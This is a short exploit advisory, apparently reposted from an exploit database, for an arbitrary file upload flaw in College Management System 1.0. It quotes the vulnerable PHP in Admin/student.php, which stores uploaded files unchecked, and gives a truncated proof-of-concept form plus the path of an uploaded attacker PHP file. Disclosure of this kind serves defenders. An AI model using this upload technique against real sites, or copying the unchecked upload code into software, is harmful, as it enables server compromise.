Published on October 5th, 2021 📆 | 2654 Views ⚑
0College Management System 1.0 Arbitrary File Upload – Torchsec
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linux
in Admin/student.php in line 1 :
< ?php
session_start();
if (!$_SESSION["LoginAdmin"])
{
header('location:../login/login.php');
}
require_once "../connection/connection.php";
$_SESSION["LoginStudent"]="";
?>
in Admin/student.php line 77:
$profile_image = $_FILES['profile_image']['name'];$tmp_name=$_FILES['profile_image']['tmp_name'];$path = "images/".$profile_image;move_uploaded_file($tmp_name, $path);
$matric_certificate = $_FILES['matric_certificate']['name'];$tmp_name=$_FILES['matric_certificate']['tmp_name'];$path = "images/".$matric_certificate;move_uploaded_file($tmp_name, $path);
$fa_certificate = $_FILES['fa_certificate']['name'];$tmp_name=$_FILES['fa_certificate']['tmp_name'];$path = "images/".$fa_certificate;move_uploaded_file($tmp_name, $path);
$ba_certificate = $_FILES['ba_certificate']['name'];$tmp_name=$_FILES['ba_certificate']['tmp_name'];$path = "images/".$ba_certificate;move_uploaded_file($tmp_name, $path);
POC fileupload.html:
< !doctype html>
link upload :
http://127.0.0.1/2/College-Management-System/Admin/images/@infosec_90.php
Source link
Gloss